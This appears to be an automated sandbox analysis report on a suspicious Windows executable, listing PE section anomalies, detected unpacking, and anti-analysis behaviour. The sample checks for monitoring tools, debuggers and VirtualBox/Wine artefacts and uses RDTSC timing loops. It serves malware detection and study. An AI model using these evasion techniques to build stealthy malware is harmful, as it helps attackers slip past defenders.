Source: C:\Users\user\Desktop\1o81tDUu5M.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\1o81tDUu5M.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\1o81tDUu5M.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\1o81tDUu5M.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\1o81tDUu5M.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\1o81tDUu5M.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\1o81tDUu5M.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\1o81tDUu5M.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\1o81tDUu5M.exeSection loaded: kernel.appcore.dllJump to behavior
Source: 1o81tDUu5M.exeStatic file information: File size 4456448 > 1048576
Source: 1o81tDUu5M.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x283e00
Source: 1o81tDUu5M.exeStatic PE information: Raw size of obbejfdq is bigger than: 0x100000 < 0x1b8600

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\1o81tDUu5M.exeUnpacked PE file: 0.2.1o81tDUu5M.exe.930000.0.unpack :EW;.rsrc:W;.idata :W; :EW;obbejfdq:EW;msdghfca:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;obbejfdq:EW;msdghfca:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: 1o81tDUu5M.exeStatic PE information: real checksum: 0x4488ec should be: 0x44fd50
Source: 1o81tDUu5M.exeStatic PE information: section name:
Source: 1o81tDUu5M.exeStatic PE information: section name: .idata
Source: 1o81tDUu5M.exeStatic PE information: section name:
Source: 1o81tDUu5M.exeStatic PE information: section name: obbejfdq
Source: 1o81tDUu5M.exeStatic PE information: section name: msdghfca
Source: 1o81tDUu5M.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_3_01697A29 push ecx; iretd 0_3_01697A2A
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_3_01697A29 push ecx; iretd 0_3_01697A2A
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_3_016AEAE8 push eax; iretd 0_3_016AEB21
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_3_016AEAE8 push eax; iretd 0_3_016AEB21
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_3_016ACF65 push eax; iretd 0_3_016ACF75
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_3_016ACF65 push eax; iretd 0_3_016ACF75
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_3_016A784C push ss; retf 0_3_016A7861
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_3_016A784C push ss; retf 0_3_016A7861
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_3_016ACF50 push 00000001h; iretd 0_3_016ACF5C
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_3_016ACF50 push 00000001h; iretd 0_3_016ACF5C
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_3_016AEB22 push 00000001h; iretd 0_3_016AEB24
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_3_016AEB22 push 00000001h; iretd 0_3_016AEB24
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_3_016AEAE8 push eax; iretd 0_3_016AEB21
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_3_016AEAE8 push eax; iretd 0_3_016AEB21
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_3_016ACF65 push eax; iretd 0_3_016ACF75
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_3_016ACF65 push eax; iretd 0_3_016ACF75
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_3_016A784C push ss; retf 0_3_016A7861
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_3_016A784C push ss; retf 0_3_016A7861
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_3_016ACF50 push 00000001h; iretd 0_3_016ACF5C
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_3_016ACF50 push 00000001h; iretd 0_3_016ACF5C
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_3_016AEB22 push 00000001h; iretd 0_3_016AEB24
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_3_016AEB22 push 00000001h; iretd 0_3_016AEB24
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_3_016AEAE8 push eax; iretd 0_3_016AEB21
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_3_016AEAE8 push eax; iretd 0_3_016AEB21
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_3_016ACF65 push eax; iretd 0_3_016ACF75
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_3_016ACF65 push eax; iretd 0_3_016ACF75
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_3_016A784C push ss; retf 0_3_016A7861
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_3_016A784C push ss; retf 0_3_016A7861
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_3_016ACF50 push 00000001h; iretd 0_3_016ACF5C
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_3_016ACF50 push 00000001h; iretd 0_3_016ACF5C
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_3_016AEB22 push 00000001h; iretd 0_3_016AEB24
Source: 1o81tDUu5M.exeStatic PE information: section name: obbejfdq entropy: 7.954225116292913

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\1o81tDUu5M.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\1o81tDUu5M.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\1o81tDUu5M.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\1o81tDUu5M.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\1o81tDUu5M.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\1o81tDUu5M.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\1o81tDUu5M.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\1o81tDUu5M.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\1o81tDUu5M.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\1o81tDUu5M.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: 1o81tDUu5M.exe, 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1718517701.0000000006F8F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
Source: 1o81tDUu5M.exe, 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1718517701.0000000006F8F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: X64DBG.EXE
Source: 1o81tDUu5M.exe, 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1718517701.0000000006F8F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WINDBG.EXE
Source: 1o81tDUu5M.exe, 00000000.00000003.1718517701.0000000006F8F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: 1o81tDUu5M.exe, 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1718517701.0000000006F8F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 10D14E3 second address: 10D14F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FE80149857Dh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 10D14F6 second address: 10D1514 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147AC06h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 10D1514 second address: 10D151A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 10D151A second address: 10D153A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147AC03h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 10D1AB2 second address: 10D1ACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FE801498584h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 10D1ACB second address: 10D1AE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE80147ABFBh 0x00000008 jnp 00007FE80147ABF6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 10D3C40 second address: 10D3C45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 10D3C45 second address: 10D3C4A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 10D40F3 second address: 10D40F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 10D40F7 second address: 10D40FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 10D40FD second address: 10D412B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE80149857Ch 0x00000008 jno 00007FE801498576h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xor dword ptr [esp], 7941348Eh 0x00000017 mov edi, dword ptr [ebp+122D2B1Bh] 0x0000001d lea ebx, dword ptr [ebp+12459BADh] 0x00000023 add edi, 5A4A4CC7h 0x00000029 xchg eax, ebx 0x0000002a push edx 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 10D412B second address: 10D413E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jng 00007FE80147ABF6h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 10F3F54 second address: 10F3F5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 10F3F5F second address: 10F3F65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 10F3F65 second address: 10F3F69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 10F4236 second address: 10F423C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 10F423C second address: 10F4240 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 10F4529 second address: 10F452E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 10F480A second address: 10F4810 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 10F4810 second address: 10F4816 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 10F4816 second address: 10F4824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jne 00007FE801498576h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 10F5199 second address: 10F51A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 10F51A0 second address: 10F51A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 10F51A9 second address: 10F51B3 instructions: 0x00000000 rdtsc 0x00000002 js 00007FE80147ABF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 10F52E4 second address: 10F52E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 10F52E8 second address: 10F52F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 10F52F2 second address: 10F52F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 10F52F8 second address: 10F5328 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FE80147AC06h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jp 00007FE80147ABFEh 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 10F5328 second address: 10F532C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 10F9281 second address: 10F92A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147AC07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 10F92A3 second address: 10F92AD instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE801498576h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 10F93EE second address: 10F93F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 10F9534 second address: 10F953A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 10F953A second address: 10F953E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 10F953E second address: 10F9564 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE801498587h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 10F9564 second address: 10F9568 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 10FC5BC second address: 10FC5C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 10FC5C1 second address: 10FC5C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 10FC5C7 second address: 10FC5D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FE801498576h 0x0000000a popad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1100A44 second address: 1100A4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1100014 second address: 1100018 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1100018 second address: 1100022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11001B8 second address: 11001C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FE801498576h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11001C2 second address: 11001D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147AC00h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11008C0 second address: 11008C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11008C4 second address: 11008E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147AC05h 0x00000007 jc 00007FE80147ABF6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11008E3 second address: 11008FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FE801498576h 0x00000009 pushad 0x0000000a popad 0x0000000b jc 00007FE801498576h 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 push ebx 0x00000016 push edx 0x00000017 pop edx 0x00000018 pop ebx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11008FF second address: 1100905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11018FD second address: 1101901 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1101901 second address: 1101907 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1101907 second address: 1101944 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE801498583h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 2DEAD27Eh 0x00000010 push ebx 0x00000011 or di, 49BDh 0x00000016 pop edi 0x00000017 push E2BA720Bh 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FE801498581h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1101944 second address: 110194F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FE80147ABF6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1101CC5 second address: 1101CC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1101CC9 second address: 1101CD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1102481 second address: 110248E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 110248E second address: 11024AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147AC09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11024AB second address: 11024B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11029AF second address: 11029B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11047CC second address: 11047D2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1105251 second address: 11052DC instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE80147AC03h 0x00000008 jmp 00007FE80147ABFDh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 jmp 00007FE80147AC00h 0x00000016 pop eax 0x00000017 nop 0x00000018 push 00000000h 0x0000001a push edi 0x0000001b call 00007FE80147ABF8h 0x00000020 pop edi 0x00000021 mov dword ptr [esp+04h], edi 0x00000025 add dword ptr [esp+04h], 00000018h 0x0000002d inc edi 0x0000002e push edi 0x0000002f ret 0x00000030 pop edi 0x00000031 ret 0x00000032 movsx esi, dx 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push esi 0x0000003a call 00007FE80147ABF8h 0x0000003f pop esi 0x00000040 mov dword ptr [esp+04h], esi 0x00000044 add dword ptr [esp+04h], 00000018h 0x0000004c inc esi 0x0000004d push esi 0x0000004e ret 0x0000004f pop esi 0x00000050 ret 0x00000051 clc 0x00000052 push 00000000h 0x00000054 movzx esi, di 0x00000057 xchg eax, ebx 0x00000058 jmp 00007FE80147ABFDh 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 pop eax 0x00000064 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11052DC second address: 11052E6 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE801498576h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1105D0B second address: 1105D10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1105A83 second address: 1105A88 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 110CA1D second address: 110CA4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147ABFDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c add di, 35D5h 0x00000011 push 00000000h 0x00000013 mov dword ptr [ebp+12473B63h], ebx 0x00000019 push 00000000h 0x0000001b mov dword ptr [ebp+122D181Dh], ebx 0x00000021 xchg eax, esi 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11085D8 second address: 11085DE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
